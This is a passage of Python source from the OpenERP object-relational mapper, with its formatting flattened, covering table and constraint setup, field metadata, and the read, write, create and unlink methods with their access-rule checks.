self._m2o_add_foreign_key_unchecked(m2m_tbl, col1, self, 'cascade') cr.execute('CREATE INDEX "%s_%s_index" ON "%s" ("%s")' % (m2m_tbl, col1, m2m_tbl, col1)) cr.execute('CREATE INDEX "%s_%s_index" ON "%s" ("%s")' % (m2m_tbl, col2, m2m_tbl, col2)) cr.execute("COMMENT ON TABLE \"%s\" IS 'RELATION BETWEEN %s AND %s'" % (m2m_tbl, self._table, ref)) cr.commit() _schema.debug("Create table '%s': m2m relation between '%s' and '%s'", m2m_tbl, self._table, ref) def _add_sql_constraints(self, cr): """ Modify this model's database table constraints so they match the one in _sql_constraints. """ def unify_cons_text(txt): return txt.lower().replace(', ',',').replace(' (','(') for (key, con, _) in self._sql_constraints: conname = '%s_%s' % (self._table, key) cr.execute("SELECT conname, pg_catalog.pg_get_constraintdef(oid, true) as condef FROM pg_constraint where conname=%s", (conname,)) existing_constraints = cr.dictfetchall() sql_actions = { 'drop': { 'execute': False, 'query': 'ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (self._table, conname, ), 'msg_ok': "Table '%s': dropped constraint '%s'. Reason: its definition changed from '%%s' to '%s'" % ( self._table, conname, con), 'msg_err': "Table '%s': unable to drop \'%s\' constraint !" % (self._table, con), 'order': 1, }, 'add': { 'execute': False, 'query': 'ALTER TABLE "%s" ADD CONSTRAINT "%s" %s' % (self._table, conname, con,), 'msg_ok': "Table '%s': added constraint '%s' with definition=%s" % (self._table, conname, con), 'msg_err': "Table '%s': unable to add \'%s\' constraint !\n If you want to have it, you should update the records and execute manually:\n%%s" % ( self._table, con), 'order': 2, }, } if not existing_constraints: # constraint does not exists: sql_actions['add']['execute'] = True sql_actions['add']['msg_err'] = sql_actions['add']['msg_err'] % (sql_actions['add']['query'], ) elif unify_cons_text(con) not in [unify_cons_text(item['condef']) for item in existing_constraints]: # constraint exists but its definition has changed: sql_actions['drop']['execute'] = True sql_actions['drop']['msg_ok'] = sql_actions['drop']['msg_ok'] % (existing_constraints[0]['condef'].lower(), ) sql_actions['add']['execute'] = True sql_actions['add']['msg_err'] = sql_actions['add']['msg_err'] % (sql_actions['add']['query'], ) # we need to add the constraint: sql_actions = [item for item in sql_actions.values()] sql_actions.sort(key=lambda x: x['order']) for sql_action in [action for action in sql_actions if action['execute']]: try: cr.execute(sql_action['query']) cr.commit() _schema.debug(sql_action['msg_ok']) except: _schema.warning(sql_action['msg_err']) cr.rollback() def _execute_sql(self, cr): """ Execute the SQL code from the _sql attribute (if any).""" if hasattr(self, "_sql"): for line in self._sql.split(';'): line2 = line.replace('\n', '').strip() if line2: cr.execute(line2) cr.commit() # # Update objects that uses this one to update their _inherits fields # def _inherits_reload_src(self): """ Recompute the _inherit_fields mapping on each _inherits'd child model.""" for obj in self.pool.models.values(): if self._name in obj._inherits: obj._inherits_reload() def _inherits_reload(self): """ Recompute the _inherit_fields mapping. This will also call itself on each inherits'd child model. """ res = {} for table in self._inherits: other = self.pool.get(table) for col in other._columns.keys(): res[col] = (table, self._inherits[table], other._columns[col], table) for col in other._inherit_fields.keys(): res[col] = (table, self._inherits[table], other._inherit_fields[col][2], other._inherit_fields[col][3]) self._inherit_fields = res self._all_columns = self._get_column_infos() self._inherits_reload_src() def _get_column_infos(self): """Returns a dict mapping all fields names (direct fields and inherited field via _inherits) to a ``column_info`` struct giving detailed columns """ result = {} for k, (parent, m2o, col, original_parent) in self._inherit_fields.iteritems(): result[k] = fields.column_info(k, col, parent, m2o, original_parent) for k, col in self._columns.iteritems(): result[k] = fields.column_info(k, col) return result def _inherits_check(self): for table, field_name in self._inherits.items(): if field_name not in self._columns: _logger.info('Missing many2one field definition for _inherits reference "%s" in "%s", using default one.', field_name, self._name) self._columns[field_name] = fields.many2one(table, string="Automatically created field to link to parent %s" % table, required=True, ondelete="cascade") elif not self._columns[field_name].required or self._columns[field_name].ondelete.lower() != "cascade": _logger.warning('Field definition for _inherits reference "%s" in "%s" must be marked as "required" with ondelete="cascade", forcing it.', field_name, self._name) self._columns[field_name].required = True self._columns[field_name].ondelete = "cascade" #def __getattr__(self, name): # """ # Proxies attribute accesses to the `inherits` parent so we can call methods defined on the inherited parent # (though inherits doesn't use Python inheritance). # Handles translating between local ids and remote ids. # Known issue: doesn't work correctly when using python's own super(), don't involve inherit-based inheritance # when you have inherits. # """ # for model, field in self._inherits.iteritems(): # proxy = self.pool.get(model) # if hasattr(proxy, name): # attribute = getattr(proxy, name) # if not hasattr(attribute, '__call__'): # return attribute # break # else: # return super(orm, self).__getattr__(name) # def _proxy(cr, uid, ids, *args, **kwargs): # objects = self.browse(cr, uid, ids, kwargs.get('context', None)) # lst = [obj[field].id for obj in objects if obj[field]] # return getattr(proxy, name)(cr, uid, lst, *args, **kwargs) # return _proxy def fields_get(self, cr, user, allfields=None, context=None, write_access=True): """ Return the definition of each field. The returned value is a dictionary (indiced by field name) of dictionaries. The _inherits'd fields are included. The string, help, and selection (if present) attributes are translated. :param cr: database cursor :param user: current user id :param fields: list of fields :param context: context arguments, like lang, time zone :return: dictionary of field dictionaries, each one describing a field of the business object :raise AccessError: * if user has no create/write rights on the requested object """ if context is None: context = {} write_access = self.check_write(cr, user, False) or \ self.check_create(cr, user, False) res = {} translation_obj = self.pool.get('ir.translation') for parent in self._inherits: res.update(self.pool.get(parent).fields_get(cr, user, allfields, context)) for f, field in self._columns.iteritems(): if allfields and f not in allfields: continue res[f] = fields.field_to_dict(self, cr, user, field, context=context) if not write_access: res[f]['readonly'] = True res[f]['states'] = {} if 'string' in res[f]: res_trans = translation_obj._get_source(cr, user, self._name + ',' + f, 'field', context.get('lang', False) or 'en_US') if res_trans: res[f]['string'] = res_trans if 'help' in res[f]: help_trans = translation_obj._get_source(cr, user, self._name + ',' + f, 'help', context.get('lang', False) or 'en_US') if help_trans: res[f]['help'] = help_trans if 'selection' in res[f]: if isinstance(field.selection, (tuple, list)): sel = field.selection sel2 = [] for key, val in sel: val2 = None if val: val2 = translation_obj._get_source(cr, user, self._name + ',' + f, 'selection', context.get('lang', False) or 'en_US', val) sel2.append((key, val2 or val)) res[f]['selection'] = sel2 return res def read(self, cr, user, ids, fields=None, context=None, load='_classic_read'): """ Read records with given ids with the given fields :param cr: database cursor :param user: current user id :param ids: id or list of the ids of the records to read :param fields: optional list of field names to return (default: all fields would be returned) :type fields: list (example ['field_name_1', ...]) :param context: optional context dictionary - it may contains keys for specifying certain options like ``context_lang``, ``context_tz`` to alter the results of the call. A special ``bin_size`` boolean flag may also be passed in the context to request the value of all fields.binary columns to be returned as the size of the binary instead of its contents. This can also be selectively overriden by passing a field-specific flag in the form ``bin_size_XXX: True/False`` where ``XXX`` is the name of the field. Note: The ``bin_size_XXX`` form is new in OpenERP v6.0. :return: list of dictionaries((dictionary per record asked)) with requested field values :rtype: [{‘name_of_the_field’: value, ...}, ...] :raise AccessError: * if user has no read rights on the requested object * if user tries to bypass access rules for read on the requested object """ if not context: context = {} self.check_read(cr, user) if not fields: fields = list(set(self._columns.keys() + self._inherit_fields.keys())) if isinstance(ids, (int, long)): select = [ids] else: select = ids select = map(lambda x: isinstance(x, dict) and x['id'] or x, select) result = self._read_flat(cr, user, select, fields, context, load) for r in result: for key, v in r.items(): if v is None: r[key] = False if isinstance(ids, (int, long, dict)): return result and result[0] or False return result def _read_flat(self, cr, user, ids, fields_to_read, context=None, load='_classic_read'): if not context: context = {} if not ids: return [] if fields_to_read == None: fields_to_read = self._columns.keys() # Construct a clause for the security rules. # 'tables' hold the list of tables necessary for the SELECT including the ir.rule clauses, # or will at least contain self._table. rule_clause, rule_params, tables = self.pool.get('ir.rule').domain_get(cr, user, self._name, 'read', context=context) # all inherited fields + all non inherited fields for which the attribute whose name is in load is True fields_pre = [f for f in fields_to_read if f == self.CONCURRENCY_CHECK_FIELD or (f in self._columns and getattr(self._columns[f], '_classic_write')) ] + self._inherits.values() res = [] if len(fields_pre): def convert_field(f): f_qual = '%s."%s"' % (self._table, f) # need fully-qualified references in case len(tables) > 1 if f in ('create_date', 'write_date'): return "date_trunc('second', %s) as %s" % (f_qual, f) if f == self.CONCURRENCY_CHECK_FIELD: if self._log_access: return "COALESCE(%s.write_date, %s.create_date, (now() at time zone 'UTC'))::timestamp AS %s" % (self._table, self._table, f,) return "(now() at time zone 'UTC')::timestamp AS %s" % (f,) if isinstance(self._columns[f], fields.binary) and context.get('bin_size', False): return 'length(%s) as "%s"' % (f_qual, f) return f_qual fields_pre2 = map(convert_field, fields_pre) order_by = self._parent_order or self._order select_fields = ','.join(fields_pre2 + [self._table + '.id']) query = 'SELECT %s FROM %s WHERE %s.id IN %%s' % (select_fields, ','.join(tables), self._table) if rule_clause: query += " AND " + (' OR '.join(rule_clause)) query += " ORDER BY " + order_by for sub_ids in cr.split_for_in_conditions(ids): if rule_clause: cr.execute(query, [tuple(sub_ids)] + rule_params) if cr.rowcount != len(sub_ids): raise except_orm(_('AccessError'), _('Operation prohibited by access rules, or performed on an already deleted document (Operation: read, Document type: %s).') % (self._description,)) else: cr.execute(query, (tuple(sub_ids),)) res.extend(cr.dictfetchall()) else: res = map(lambda x: {'id': x}, ids) for f in fields_pre: if f == self.CONCURRENCY_CHECK_FIELD: continue if self._columns[f].translate: ids = [x['id'] for x in res] #TODO: optimize out of this loop res_trans = self.pool.get('ir.translation')._get_ids(cr, user, self._name+','+f, 'model', context.get('lang', False) or 'en_US', ids) for r in res: r[f] = res_trans.get(r['id'], False) or r[f] for table in self._inherits: col = self._inherits[table] cols = [x for x in intersect(self._inherit_fields.keys(), fields_to_read) if x not in self._columns.keys()] if not cols: continue res2 = self.pool.get(table).read(cr, user, [x[col] for x in res], cols, context, load) res3 = {} for r in res2: res3[r['id']] = r del r['id'] for record in res: if not record[col]: # if the record is deleted from _inherits table? continue record.update(res3[record[col]]) if col not in fields_to_read: del record[col] # all fields which need to be post-processed by a simple function (symbol_get) fields_post = filter(lambda x: x in self._columns and self._columns[x]._symbol_get, fields_to_read) if fields_post: for r in res: for f in fields_post: r[f] = self._columns[f]._symbol_get(r[f]) ids = [x['id'] for x in res] # all non inherited fields for which the attribute whose name is in load is False fields_post = filter(lambda x: x in self._columns and not getattr(self._columns[x], load), fields_to_read) # Compute POST fields todo = {} for f in fields_post: todo.setdefault(self._columns[f]._multi, []) todo[self._columns[f]._multi].append(f) for key, val in todo.items(): if key: res2 = self._columns[val[0]].get(cr, self, ids, val, user, context=context, values=res) assert res2 is not None, \ 'The function field "%s" on the "%s" model returned None\n' \ '(a dictionary was expected).' % (val[0], self._name) for pos in val: for record in res: if isinstance(res2[record['id']], str): res2[record['id']] = eval(res2[record['id']]) #TOCHECK : why got string instend of dict in python2.6 multi_fields = res2.get(record['id'],{}) if multi_fields: record[pos] = multi_fields.get(pos,[]) else: for f in val: res2 = self._columns[f].get(cr, self, ids, f, user, context=context, values=res) for record in res: if res2: record[f] = res2[record['id']] else: record[f] = [] readonly = None for vals in res: for field in vals.copy(): fobj = None if field in self._columns: fobj = self._columns[field] if not fobj: continue groups = fobj.read if groups: edit = False for group in groups: module = group.split(".")[0] grp = group.split(".")[1] cr.execute("select count(*) from res_groups_users_rel where gid IN (select res_id from ir_model_data where name=%s and module=%s and model=%s) and uid=%s", \ (grp, module, 'res.groups', user)) readonly = cr.fetchall() if readonly[0][0] >= 1: edit = True break elif readonly[0][0] == 0: edit = False else: edit = False if not edit: if type(vals[field]) == type([]): vals[field] = [] elif type(vals[field]) == type(0.0): vals[field] = 0 elif type(vals[field]) == type(''): vals[field] = '=No Permission=' else: vals[field] = False return res # TODO check READ access def perm_read(self, cr, user, ids, context=None, details=True): """ Returns some metadata about the given records. :param details: if True, \*_uid fields are replaced with the name of the user :return: list of ownership dictionaries for each requested record :rtype: list of dictionaries with the following keys: * id: object id * create_uid: user who created the record * create_date: date when the record was created * write_uid: last user who changed the record * write_date: date of the last change to the record * xmlid: XML ID to use to refer to this record (if there is one), in format ``module.name`` """ if not context: context = {} if not ids: return [] fields = '' uniq = isinstance(ids, (int, long)) if uniq: ids = [ids] fields = ['id'] if self._log_access: fields += ['create_uid', 'create_date', 'write_uid', 'write_date'] quoted_table = '"%s"' % self._table fields_str = ",".join('%s.%s'%(quoted_table, field) for field in fields) query = '''SELECT %s, __imd.module, __imd.name FROM %s LEFT JOIN ir_model_data __imd ON (__imd.model = %%s and __imd.res_id = %s.id) WHERE %s.id IN %%s''' % (fields_str, quoted_table, quoted_table, quoted_table) cr.execute(query, (self._name, tuple(ids))) res = cr.dictfetchall() for r in res: for key in r: r[key] = r[key] or False if details and key in ('write_uid', 'create_uid') and r[key]: try: r[key] = self.pool.get('res.users').name_get(cr, user, [r[key]])[0] except Exception: pass # Leave the numeric uid there r['xmlid'] = ("%(module)s.%(name)s" % r) if r['name'] else False del r['name'], r['module'] if uniq: return res[ids[0]] return res def _check_concurrency(self, cr, ids, context): if not context: return if not (context.get(self.CONCURRENCY_CHECK_FIELD) and self._log_access): return check_clause = "(id = %s AND %s < COALESCE(write_date, create_date, (now() at time zone 'UTC'))::timestamp)" for sub_ids in cr.split_for_in_conditions(ids): ids_to_check = [] for id in sub_ids: id_ref = "%s,%s" % (self._name, id) update_date = context[self.CONCURRENCY_CHECK_FIELD].pop(id_ref, None) if update_date: ids_to_check.extend([id, update_date]) if not ids_to_check: continue cr.execute("SELECT id FROM %s WHERE %s" % (self._table, " OR ".join([check_clause]*(len(ids_to_check)/2))), tuple(ids_to_check)) res = cr.fetchone() if res: # mention the first one only to keep the error message readable raise except_orm('ConcurrencyException', _('A document was modified since you last viewed it (%s:%d)') % (self._description, res[0])) def check_access_rights(self, cr, uid, operation, raise_exception=True): # no context on purpose. """Verifies that the operation given by ``operation`` is allowed for the user according to the access rights.""" return self.pool.get('ir.model.access').check(cr, uid, self._name, operation, raise_exception) def check_create(self, cr, uid, raise_exception=True): return self.check_access_rights(cr, uid, 'create', raise_exception) def check_read(self, cr, uid, raise_exception=True): return self.check_access_rights(cr, uid, 'read', raise_exception) def check_unlink(self, cr, uid, raise_exception=True): return self.check_access_rights(cr, uid, 'unlink', raise_exception) def check_write(self, cr, uid, raise_exception=True): return self.check_access_rights(cr, uid, 'write', raise_exception) def check_access_rule(self, cr, uid, ids, operation, context=None): """Verifies that the operation given by ``operation`` is allowed for the user according to ir.rules. :param operation: one of ``write``, ``unlink`` :raise except_orm: * if current ir.rules do not permit this operation. :return: None if the operation is allowed """ if uid == SUPERUSER_ID: return if self.is_transient(): # Only one single implicit access rule for transient models: owner only! # This is ok to hardcode because we assert that TransientModels always # have log_access enabled and this the create_uid column is always there. # And even with _inherits, these fields are always present in the local # table too, so no need for JOINs. cr.execute("""SELECT distinct create_uid FROM %s WHERE id IN %%s""" % self._table, (tuple(ids),)) uids = [x[0] for x in cr.fetchall()] if len(uids) != 1 or uids[0] != uid: raise except_orm(_('AccessError'), '%s access is ' 'restricted to your own records for transient models ' '(except for the super-user).' % operation.capitalize()) else: where_clause, where_params, tables = self.pool.get('ir.rule').domain_get(cr, uid, self._name, operation, context=context) if where_clause: where_clause = ' and ' + ' and '.join(where_clause) for sub_ids in cr.split_for_in_conditions(ids): cr.execute('SELECT ' + self._table + '.id FROM ' + ','.join(tables) + ' WHERE ' + self._table + '.id IN %s' + where_clause, [sub_ids] + where_params) if cr.rowcount != len(sub_ids): raise except_orm(_('AccessError'), _('Operation prohibited by access rules, or performed on an already deleted document (Operation: %s, Document type: %s).') % (operation, self._description)) def unlink(self, cr, uid, ids, context=None): """ Delete records with given ids :param cr: database cursor :param uid: current user id :param ids: id or list of ids :param context: (optional) context arguments, like lang, time zone :return: True :raise AccessError: * if user has no unlink rights on the requested object * if user tries to bypass access rules for unlink on the requested object :raise UserError: if the record is default property for other records """ if not ids: return True if isinstance(ids, (int, long)): ids = [ids] result_store = self._store_get_values(cr, uid, ids, self._all_columns.keys(), context) self._check_concurrency(cr, ids, context) self.check_unlink(cr, uid) ir_property = self.pool.get('ir.property') # Check if the records are used as default properties. domain = [('res_id', '=', False), ('value_reference', 'in', ['%s,%s' % (self._name, i) for i in ids]), ] if ir_property.search(cr, uid, domain, context=context): raise except_orm(_('Error'), _('Unable to delete this document because it is used as a default property')) # Delete the records' properties. property_ids = ir_property.search(cr, uid, [('res_id', 'in', ['%s,%s' % (self._name, i) for i in ids])], context=context) ir_property.unlink(cr, uid, property_ids, context=context) wf_service = netsvc.LocalService("workflow") for oid in ids: wf_service.trg_delete(uid, self._name, oid, cr) self.check_access_rule(cr, uid, ids, 'unlink', context=context) pool_model_data = self.pool.get('ir.model.data') ir_values_obj = self.pool.get('ir.values') for sub_ids in cr.split_for_in_conditions(ids): cr.execute('delete from ' + self._table + ' ' \ 'where id IN %s', (sub_ids,)) # Removing the ir_model_data reference if the record being deleted is a record created by xml/csv file, # as these are not connected with real database foreign keys, and would be dangling references. # Note: following steps performed as admin to avoid access rights restrictions, and with no context # to avoid possible side-effects during admin calls. # Step 1. Calling unlink of ir_model_data only for the affected IDS reference_ids = pool_model_data.search(cr, SUPERUSER_ID, [('res_id','in',list(sub_ids)),('model','=',self._name)]) # Step 2. Marching towards the real deletion of referenced records if reference_ids: pool_model_data.unlink(cr, SUPERUSER_ID, reference_ids) # For the same reason, removing the record relevant to ir_values ir_value_ids = ir_values_obj.search(cr, uid, ['|',('value','in',['%s,%s' % (self._name, sid) for sid in sub_ids]),'&',('res_id','in',list(sub_ids)),('model','=',self._name)], context=context) if ir_value_ids: ir_values_obj.unlink(cr, uid, ir_value_ids, context=context) for order, object, store_ids, fields in result_store: if object != self._name: obj = self.pool.get(object) cr.execute('select id from '+obj._table+' where id IN %s', (tuple(store_ids),)) rids = map(lambda x: x[0], cr.fetchall()) if rids: obj._store_set_values(cr, uid, rids, fields, context) return True # # TODO: Validate # def write(self, cr, user, ids, vals, context=None): """ Update records with given ids with the given field values :param cr: database cursor :param user: current user id :type user: integer :param ids: object id or list of object ids to update according to **vals** :param vals: field values to update, e.g {'field_name': new_field_value, ...} :type vals: dictionary :param context: (optional) context arguments, e.g. {'lang': 'en_us', 'tz': 'UTC', ...} :type context: dictionary :return: True :raise AccessError: * if user has no write rights on the requested object * if user tries to bypass access rules for write on the requested object :raise ValidateError: if user tries to enter invalid value for a field that is not in selection :raise UserError: if a loop would be created in a hierarchy of objects a result of the operation (such as setting an object as its own parent) **Note**: The type of field values to pass in ``vals`` for relationship fields is specific: + For a many2many field, a list of tuples is expected. Here is the list of tuple that are accepted, with the corresponding semantics :: (0, 0, { values }) link to a new record that needs to be created with the given values dictionary (1, ID, { values }) update the linked record with id = ID (write *values* on it) (2, ID) remove and delete the linked record with id = ID (calls unlink on ID, that will delete the object completely, and the link to it as well) (3, ID) cut the link to the linked record with id = ID (delete the relationship between the two objects but does not delete the target object itself) (4, ID) link to existing record with id = ID (adds a relationship) (5) unlink all (like using (3,ID) for all linked records) (6, 0, [IDs]) replace the list of linked IDs (like using (5) then (4,ID) for each ID in the list of IDs) Example: [(6, 0, [8, 5, 6, 4])] sets the many2many to ids [8, 5, 6, 4] + For a one2many field, a lits of tuples is expected. Here is the list of tuple that are accepted, with the corresponding semantics :: (0, 0, { values }) link to a new record that needs to be created with the given values dictionary (1, ID, { values }) update the linked record with id = ID (write *values* on it) (2, ID) remove and delete the linked record with id = ID (calls unlink on ID, that will delete the object completely, and the link to it as well) Example: [(0, 0, {'field_name':field_value_record1, ...}), (0, 0, {'field_name':field_value_record2, ...})] + For a many2one field, simply use the ID of target record, which must already exist, or ``False`` to remove the link. + For a reference field, use a string with the model name, a comma, and the target object id (example: ``'product.product, 5'``) """ readonly = None for field in vals.copy(): fobj = None if field in self._columns: fobj = self._columns[field] elif field in self._inherit_fields: fobj = self._inherit_fields[field][2] if not fobj: continue groups = fobj.write if groups: edit = False for group in groups: module = group.split(".")[0] grp = group.split(".")[1] cr.execute("select count(*) from res_groups_users_rel where gid IN (select res_id from ir_model_data where name=%s and module=%s and model=%s) and uid=%s", \ (grp, module, 'res.groups', user)) readonly = cr.fetchall() if readonly[0][0] >= 1: edit = True break if not edit: vals.pop(field) if not context: context = {} if not ids: return True if isinstance(ids, (int, long)): ids = [ids] self._check_concurrency(cr, ids, context) self.check_write(cr, user) result = self._store_get_values(cr, user, ids, vals.keys(), context) or [] # No direct update of parent_left/right vals.pop('parent_left', None) vals.pop('parent_right', None) parents_changed = [] parent_order = self._parent_order or self._order if self._parent_store and (self._parent_name in vals): # The parent_left/right computation may take up to # 5 seconds. No need to recompute the values if the # parent is the same. # Note: to respect parent_order, nodes must be processed in # order, so ``parents_changed`` must be ordered properly. parent_val = vals[self._parent_name] if parent_val: query = "SELECT id FROM %s WHERE id IN %%s AND (%s != %%s OR %s IS NULL) ORDER BY %s" % \ (self._table, self._parent_name, self._parent_name, parent_order) cr.execute(query, (tuple(ids), parent_val)) else: query = "SELECT id FROM %s WHERE id IN %%s AND (%s IS NOT NULL) ORDER BY %s" % \ (self._table, self._parent_name, parent_order) cr.execute(query, (tuple(ids),)) parents_changed = map(operator.itemgetter(0), cr.fetchall()) upd0 = [] upd1 = [] upd_todo = [] updend = [] direct = [] totranslate = context.get('lang', False) and (context['lang'] != 'en_US') for field in vals: if field in self._columns: if self._columns[field]._classic_write and not (hasattr(self._columns[field], '_fnct_inv')): if (not totranslate) or not self._columns[field].translate: upd0.append('"'+field+'"='+self._columns[field]._symbol_set[0]) upd1.append(self._columns[field]._symbol_set[1](vals[field])) direct.append(field) else: upd_todo.append(field) else: updend.append(field) if field in self._columns \ and hasattr(self._columns[field], 'selection') \ and vals[field]: self._check_selection_field_value(cr, user, field, vals[field], context=context) if self._log_access: upd0.append('write_uid=%s') upd0.append("write_date=(now() at time zone 'UTC')") upd1.append(user) if len(upd0): self.check_access_rule(cr, user, ids, 'write', context=context) for sub_ids in cr.split_for_in_conditions(ids): cr.execute('update ' + self._table + ' set ' + ','.join(upd0) + ' ' \ 'where id IN %s', upd1 + [sub_ids]) if cr.rowcount != len(sub_ids): raise except_orm(_('AccessError'), _('One of the records you are trying to modify has already been deleted (Document type: %s).') % self._description) if totranslate: # TODO: optimize for f in direct: if self._columns[f].translate: src_trans = self.pool.get(self._name).read(cr, user, ids, [f])[0][f] if not src_trans: src_trans = vals[f] # Inserting value to DB self.write(cr, user, ids, {f: vals[f]}) self.pool.get('ir.translation')._set_ids(cr, user, self._name+','+f, 'model', context['lang'], ids, vals[f], src_trans) # call the 'set' method of fields which are not classic_write upd_todo.sort(lambda x, y: self._columns[x].priority-self._columns[y].priority) # default element in context must be removed when call a one2many or many2many rel_context = context.copy() for c in context.items(): if c[0].startswith('default_'): del rel_context[c[0]] for field in upd_todo: for id in ids: result += self._columns[field].set(cr, self, id, field, vals[field], user, context=rel_context) or [] unknown_fields = updend[:] for table in self._inherits: col = self._inherits[table] nids = [] for sub_ids in cr.split_for_in_conditions(ids): cr.execute('select distinct "'+col+'" from "'+self._table+'" ' \ 'where id IN %s', (sub_ids,)) nids.extend([x[0] for x in cr.fetchall()]) v = {} for val in updend: if self._inherit_fields[val][0] == table: v[val] = vals[val] unknown_fields.remove(val) if v: self.pool.get(table).write(cr, user, nids, v, context) if unknown_fields: _logger.warning( 'No such field(s) in model %s: %s.', self._name, ', '.join(unknown_fields)) self._validate(cr, user, ids, context) # TODO: use _order to set dest at the right position and not first node of parent # We can't defer parent_store computation because the stored function # fields that are computer may refer (directly or indirectly) to # parent_left/right (via a child_of domain) if parents_changed: if self.pool._init: self.pool._init_parent[self._name] = True else: order = self._parent_order or self._order parent_val = vals[self._parent_name] if parent_val: clause, params = '%s=%%s' % (self._parent_name,), (parent_val,) else: clause, params = '%s IS NULL' % (self._parent_name,), () for id in parents_changed: cr.execute('SELECT parent_left, parent_right FROM %s WHERE id=%%s' % (self._table,), (id,)) pleft, pright = cr.fetchone() distance = pright - pleft + 1 # Positions of current siblings, to locate proper insertion point; # this can _not_ be fetched outside the loop, as it needs to be refreshed # after each update, in case several nodes are sequentially inserted one # next to the other (i.e computed incrementally) cr.execute('SELECT parent_right, id FROM %s WHERE %s ORDER BY %s' % (self._table, clause, parent_order), params) parents = cr.fetchall() # Find Position of the element position = None for (parent_pright, parent_id) in parents: if parent_id == id: break position = parent_pright + 1 # It's the first node of the parent if not position: if not parent_val: position = 1 else: cr.execute('select parent_left from '+self._table+' where id=%s', (parent_val,)) position = cr.fetchone()[0] + 1 if pleft < position <= pright: raise except_orm(_('UserError'), _('Recursivity Detected.')) if pleft < position: cr.execute('update '+self._table+' set parent_left=parent_left+%s where parent_left>=%s', (distance, position)) cr.execute('update '+self._table+' set parent_right=parent_right+%s where parent_right>=%s', (distance, position)) cr.execute('update '+self._table+' set parent_left=parent_left+%s, parent_right=parent_right+%s where parent_left>=%s and parent_left<%s', (position-pleft, position-pleft, pleft, pright)) else: cr.execute('update '+self._table+' set parent_left=parent_left+%s where parent_left>=%s', (distance, position)) cr.execute('update '+self._table+' set parent_right=parent_right+%s where parent_right>=%s', (distance, position)) cr.execute('update '+self._table+' set parent_left=parent_left-%s, parent_right=parent_right-%s where parent_left>=%s and parent_left<%s', (pleft-position+distance, pleft-position+distance, pleft+distance, pright+distance)) result += self._store_get_values(cr, user, ids, vals.keys(), context) result.sort() done = {} for order, object, ids_to_update, fields_to_recompute in result: key = (object, tuple(fields_to_recompute)) done.setdefault(key, {}) # avoid to do several times the same computation todo = [] for id in ids_to_update: if id not in done[key]: done[key][id] = True todo.append(id) self.pool.get(object)._store_set_values(cr, user, todo, fields_to_recompute, context) wf_service = netsvc.LocalService("workflow") for id in ids: wf_service.trg_write(user, self._name, id, cr) return True # # TODO: Should set perm to user.xxx # def create(self, cr, user, vals, context=None): """ Create a new record for the model. The values for the new record are initialized using the ``vals`` argument, and if necessary the result of ``default_get()``. :param cr: database cursor :param user: current user id :type user: integer :param vals: field values for new record, e.g {'field_name': field_value, ...} :type vals: dictionary :param context: optional context arguments, e.g. {'lang': 'en_us', 'tz': 'UTC', ...} :type context: dictionary :return: id of new record created :raise AccessError: * if user has no create rights on the requested object * if user tries to bypass access rules for create on the requested object :raise ValidateError: if user tries to enter invalid value for a field that is not in selection :raise UserError: if a loop would be created in a hierarchy of objects a result of the operation (such as setting an object as its own parent) **Note**: The type of field values to pass in ``vals`` for relationship fields is specific. Please see the description of the :py:meth:`~osv.osv.osv.write` method for details about the possible values and how to specify them. """ if not context: context = {} if self.is_transient(): self._transient_vacuum(cr, user) self.check_create(cr, user) vals = self._add_missing_default_values(cr, user, vals, context) tocreate = {} for v in self._inherits: if self._inherits[v] not in vals: tocreate[v] = {} else: tocreate[v] = {'id': vals[self._inherits[v]]} (upd0, upd1, upd2) = ('', '', []) upd_todo = [] unknown_fields = [] for v in vals.keys(): if v in self._inherit_fields and v not in self._columns: (table, col, col_detail, original_parent) = self._inherit_fields[v] tocreate[table][v] = vals[v] del vals[v] else: if (v not in self._inherit_fields) and (v not in self._columns): del vals[v] unknown_fields.append(v) if unknown_fields: _logger.warning( 'No such field(s) in model %s: %s.', self._name, ', '.join(unknown_fields)) # Try-except added to filter the creation of those records whose filds are readonly. # Example : any dashboard which has all the fields readonly.(due to Views(database views)) try: cr.execute("SELECT nextval('"+self._sequence+"')") except: raise except_orm(_('UserError'), _('You cannot perform this operation. New Record Creation is not allowed for this object as this object is for reporting purpose.')) id_new = cr.fetchone()[0] for table in tocreate: if self._inherits[table] in vals: del vals[self._inherits[table]] record_id = tocreate[table].pop('id', None) # When linking/creating parent records, force context without 'no_store_function' key that # defers stored functions computing, as these won't be computed in batch at the end of create(). parent_context = dict(context) parent_context.pop('no_store_function', None) if record_id is None or not record_id: record_id = self.pool.get(table).create(cr, user, tocreate[table], context=parent_context) else: self.pool.get(table).write(cr, user, [record_id], tocreate[table], context=parent_context) upd0 += ',' + self._inherits[table] upd1 += ',%s' upd2.append(record_id) #Start : Set bool fields to be False if they are not touched(to make search more powerful) bool_fields = [x for x in self._columns.keys() if self._columns[x]._type=='boolean'] for bool_field in bool_fields: if bool_field not in vals: vals[bool_field] = False #End for field in vals.copy(): fobj = None if field in self._columns: fobj = self._columns[field] else: fobj = self._inherit_fields[field][2] if not fobj: continue groups = fobj.write if groups: edit = False for group in groups: module = group.split(".")[0] grp = group.split(".")[1] cr.execute("select count(*) from res_groups_users_rel where gid IN (select res_id from ir_model_data where name='%s' and module='%s' and model='%s') and uid=%s" % \ (grp, module, 'res.groups', user)) readonly = cr.fetchall() if readonly[0][0] >= 1: edit = True break elif readonly[0][0] == 0: edit = False else: edit = False if not edit: vals.pop(field) for field in vals: if self._columns[field]._classic_write: upd0 = upd0 + ',"' + field + '"' upd1 = upd1 + ',' + self._columns[field]._symbol_set[0] upd2.append(self._columns[field]._symbol_set[1](vals[field])) else: if not isinstance(self._columns[field], fields.related): upd_todo.append(field) if field in self._columns \ and hasattr(self._columns[field], 'selection') \ and vals[field]: self._check_selection_field_value(cr, user, field, vals[field], context=context) if self._log_access: upd0 += ',create_uid,create_date' upd1 += ",%s,(now() at time zone 'UTC')" upd2.append(user) cr.execute('insert into "'+self._table+'" (id'+upd0+") values ("+str(id_new)+upd1+')', tuple(upd2)) self.check_access_rule(cr, user, [id_new], 'create', context=context) upd_todo.sort(lambda x, y: self._columns[x].priority-self._columns[y].priority) if self._parent_store and not context.get('defer_parent_store_computation'): if self.pool._init: self.pool._init_parent[self._name] = True else: parent = vals.get(self._parent_name, False) if parent: cr.execute('select parent_right from '+self._table+' where '+self._parent_name+'=%s order by '+(self._parent_order or self._order), (parent,)) pleft_old = None result_p = cr.fetchall() for (pleft,) in result_p: if not pleft: break pleft_old = pleft if not pleft_old: cr.execute('select parent_left from '+self._table+' where id=%s', (parent,)) pleft_old = cr.fetchone()[0] pleft = pleft_old else: cr.execute('select max(parent_right) from '+self._table) 